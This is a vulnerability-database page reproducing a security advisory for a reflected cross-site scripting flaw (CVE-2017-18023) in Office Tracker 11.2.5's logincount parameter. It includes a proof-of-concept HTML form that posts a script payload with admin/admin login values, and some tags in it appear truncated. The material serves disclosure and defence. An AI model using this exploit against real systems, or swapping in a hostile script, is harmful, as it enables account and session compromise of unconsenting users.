Lucene search
K

Office Tracker 11.2.5 Cross Site Scripting

🗓️ 09 Jan 2018 00:00:00Reported by Nassim AsrirType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Office Tracker 11.2.5 XSS via logincount paramete

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Office Tracker 'logincount' Parameter Cross-Site Scripting Vulnerability
12 Jan 201800:00
cnvd
CVE
CVE-2017-18023
10 Jan 201818:00
cve
Cvelist
CVE-2017-18023
10 Jan 201818:00
cvelist
EUVD
EUVD-2017-9163
7 Oct 202500:30
euvd
NVD
CVE-2017-18023
10 Jan 201818:29
nvd
Prion
Code injection
10 Jan 201818:29
prion
`# Title: Office Tracker 11.2.5 - XSS  
  
# Author: Nassim Asrir  
  
# Contact: [email protected]  
  
# Vendor: https://www.officetracker.com/  
  
# CVE: CVE-2017-18023  
  
  
  
# Description  
  
Office Tracker 11.2.5 has XSS via the  
logincount parameter to the /otweb/OTPClientLogin URI.  
  
------------------------------------------  
  
# Details  
  
The value of the logincount request parameter is copied into the HTML  
document as plain text between tags. The payload  
chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount  
parameter. This input was echoed unmodified in the application's  
response.  
  
------------------------------------------  
  
# Vulnerability Type  
  
Cross Site Scripting (XSS)  
  
------------------------------------------  
  
# Attack Type  
  
Remote  
------------------------------------------  
  
# POC  
<html>  
  
<body  
<scripthistory.pushState('', '', '/')</script  
<form action="http://server/otweb/OTPClientLogin" method="POST"  
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" /  
<input type="hidden" name="lastname" value="MorisonM" /  
<input type="hidden" name="timezone" value="" /  
<input type="hidden" name="uid" value="" /  
<input type="hidden" name="phone" value="false" /  
<input type="hidden" name="login" value="admin" /  
<input type="hidden" name="password" value="admin" /  
<input type="hidden" name="submitbtn" value="Login" /  
<input type="submit" value="Submit request" /  
</form  
</body  
</html  
  
------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jan 2018 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00211
26